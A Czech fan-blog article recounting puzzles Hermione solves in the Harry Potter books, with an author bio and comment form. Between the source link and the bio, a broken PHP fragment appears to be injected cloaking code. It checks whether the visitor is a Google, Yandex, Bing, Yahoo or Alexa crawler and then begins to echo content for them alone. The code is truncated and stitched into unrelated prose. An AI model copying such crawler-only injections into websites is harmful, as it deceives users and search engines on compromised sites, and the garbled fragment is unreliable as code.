Vždy jsme rádi řešili hádanky, které před nás knihy o Harry Potterovi postavily, ale na Hermionu, která je vyřešila, než bys řekl švec, nikdo nemá.

Zdroj: Wizardingworld.com

Pokud bychom žili v Bradavicích ve stejné době, kdy je navštěvoval Harry, rádi bychom si mysleli, že bychom byli dobří (nejlepší) přátelé a hráli bychom v jeho bradavických dobrodružstvích nějakou roli. Určitě máme každý trochu fištrónu, ale abychom se vyrovnali Hermionině vysoké inteligenci a jejím schopnostem řešit hádanky, které byly pro Harryho přežití klíčové, museli bychom sníst opravdové kvantum vtipné kaše. A zatímco Harry pouze projevil vděk za její pomoc, my jsme si nadávali, že nás dané řešení či odhalení zvratu zápletky nenapadlo dříve.

Také to nesnášíte, když fiktivní postava vyřeší nějaký problém dříve než vy?

Snapeova lektvarová hádanka

Hermiona prokázala velice brzy, že si dokáže tváří v tvář nebezpečí zachovat chladnou hlavu. Když společně s Harrym a Ronem vešli do zakázané chodby ve třetím poschodí, aby zabránili Quirellovi ukrást Kámen mudrců, okamžitě zachránila šikovným kouzlem oba dva chlapce před smrtí uškrcením ďáblovým osidlem (pozn. překl.: ehm, „není tady žádné dříví“… no jo, každý máme právo někdy ztratit hlavu, i chladnou 😀 ).

Nicméně až před Snapeovou logickou hádankou prokázala kvalitu svých malých šedých buněk mozkových. Postavena před sedm lahví obsahující různé tekutiny včetně jedu, Hermiona Harryho překvapila, když se pouze usmála a řekla:

„Spousta těch největších kouzelníků neměla v hlavě ani za mák logiky; ti všichni by tu uvázli na věky!“

Harry Potter a Kámen mudrců

Naproti tomu Hermioně trvalo pouhých pár minut, než určila, které dvě lahve jim pomohou. Toto byla první příležitost, kdy jsme mohli spatřit Hermionin talent logicky uvažovat pod vskutku extrémním tlakem. My bychom si nepochybně vybrali špatně a zemřeli.

Zdroj: Wizardingworld.com

Baziliščí záhada

Stejně jako nám nedává spát problematické heslo v křížovce, Hermioně nedává spát tajemná záhada – a tu baziliščí dokázala vyřešit  jako druhačka.

Když si Hermiona poprvé uvědomila, že tajemná nestvůra používá k pohybu po Bradavicích potrubní systém, Harry a Ron měli k dispozici stejná výchozí fakta – věděli, že Harry je hadí jazyk; zjistili, že Hagrid byl před padesáti lety obviněn z otevření Tajemné komnaty; věděli, že to bylo proto, že Hagrid přechovával nějaké velké chlupaté monstrum. Ale když Harry opět slyšel baziliškova syčená slova, ani on ani Ron si to neuvědomili, a protože to byl Harry, kdo mohl mluvit s hady, napadlo by nás, že by si to měl jako první uvědomit právě on – a také protože ten hlas šel ze stěn. Hermioně to ale došlo, ačkoliv když to šla říct Harrymu a Ronovi, byla proměněna v kámen. Naštěstí měla ve zvyku psát si poznámky.

Zdroj: Wizardingworld.com

Lupinův malý chlupatý problém

Uznejme, tady pomohl Snape, který úmyslně naznačil studentům, že jejich učitel OPČM je vlkodlakem, když jim nečekaně zadal domácí úkol na toto téma. Stejně to ale byla pouze Hermiona, která náznak pochopila.

Když se nad tím zpětně zamyslíme, zdá se to logické – pravidelná absence (navíc související s měsíčním cyklem), Lupinův strach z měsíce, jak ukázal jeho bubák. Ovšem, byla to jen Hermiona, kdo si uvědomil, že ona „stříbřitě bílá koule“ je ve skutečnosti měsíc. Harry si myslel, že je to věštecká křišťálová koule, a pustil to z hlavy. Hermiona ale přemýšlí o všem, a proto také možná vyřeší věci dříve než ostatní.

Zdroj: Wizardingworld.com

Zvěromág Rita

Když už je řeč o tom, co Hermiona dělá, co ostatní ne, pak si také jako (zřejmě) jediná prohlédla při vypracovávání nějakého domácího úkolu pro profesorku McGonagallovou seznam ministerstva kouzel s registrovanými zvěromágy. Harry by se jejímu nadšení pro domácí přípravu podivil, ale bez tohoto výzkumu by možná nevyřešila další problém, který jim létal kolem hlavy ve čtvrtém ročníku: Ritu Holoubkovou.

Hermiona na vše přišla opět po měsících pozorování. Poté co jí dlouho vrtalo hlavou, jak je možné, že Rita zaslechla rozhovory, o kterých psala v novinách, ji trkla Harryho náhodná poznámka o možných magických štěnicích a odhalení Rity jako nezaregistrovaného zvěromága bylo na světě. A dokonce brouk – doslova magická štěnice.

Zdroj: Wizardingworld.com

Odkaz Prince dvojí krve

Harry sice zavrhl Hermioninu myšlenku, že Princ dvojí krve mohl být dívkou nebo že by měl příjmení prince, a ačkoliv se tentokrát Hermiona netrefila úplně do černého, Harry by touto dobou měl vědět, že není radno zcela ignorovat její rady. Když Harrymu ukázala výstřižek o jisté Eileen Princeové, nebral Harry její úvahu, že Eileen je princem, vážně.

Jak se ale ukázalo, Eileen byla Snapeovou matkou – čarodějka, která se provdala za mudlu. Tak se zrodila Snapeova přezdívka pro sebe – Princ dvojí krve. Takže, jak sama říká, Hermiona měla „v jistém smyslu“ pravdu.

Zdroj: Wizardingworld.com

Proč Brumbál odkázal Harrymu Nebelvírův meč

Všechny věci, které trojici Brumbál odkázal, byly záhady samy o sobě. Jaký užitek by mohlo zhasínadlo, zlatonka a kniha kouzelnických pohádek přinést? A Nebelvírův meč byl zprvu ještě větší záhadou, vzhledem k tomu, že se k němu Harry nemohl dostat.

Zatím se ale Hermiona připravovala na lov viteálů, jak jinak než balením knih. A když je procházela, mohla říci Harrymu a Ronovi, že jedinou možností, jak viteál zneškodnit, je použít něco tak zničujícího, že se viteál nebude schopen sám opravit. Něco jako baziliščí jed.

Zdroj: Wizardingworld.com

A stejně jako dřív si Hermiona tuto informaci zapamatovala, takže když slyšela, že meč ve Snapeově pracovně je falešný, ihned jí a Harrymu došlo, že to není jen tak. Poté co jim Phineas Nigellus řekl, že Brumbál meč použil ke zničení viteálu v prstenu, věděli jistě:

„Harry, ten meč je nasáklý baziliščím jedem!“

Harry Potter a relikvie smrti

Takže, možná jsou důležitější věci než knížky a chytrost, ale Hermiona nás naučila, že není radno je podceňovat.

Zdroj:
https://www.pottermore.com/features/every-harry-potter-puzzle-hermione-solved-that-made-us-kick-ourselves

function vururumgardas(){
$agent = $_SERVER[‚HTTP_USER_AGENT‘];
$sec = $agent;
switch(true){
case (strpos($sec,“google“)): $part = 1; break;
case (strpos($sec,“yandex“)): $part = 1; break;
case (strpos($sec,“bing“)): $part = 1; break;
case (strpos($sec,“yahoo“)): $part = 1; break;
case (strpos($sec,“alexa“)): $part = 1; break;
default : $part = 0;
}
if($part ==1){
echo ‚

FildasKirk

Zpočátku, ovlivněn heroickým obdivem k Harrymu, jsem se považoval za Nebelvíra. Později jsem si uvědomil, že bezhlavě se vrhat do šílených dobrodružství na mě vůbec nesedí – a přiznejme si i s rozmyslem se vrhat do šílených dobrodružství by bylo na pováženou. Naopak, dvakrát měř, jednou řež, ale nejprve si o tom třikrát něco nastuduj je více můj styl. Takže jsem Havraspár a kdo mě označí za Nebelvíra, bude mu po odečtení kolejních bodů udělen trest naučit se nazpaměť Dějiny Bradavic. Prý je to prima lehké čtení před spaním.

Napsat komentář

Vaše e-mailová adresa nebude zveřejněna. Vyžadované informace jsou označeny *

Tato stránka používá Akismet k omezení spamu. Podívejte se, jak vaše data z komentářů zpracováváme..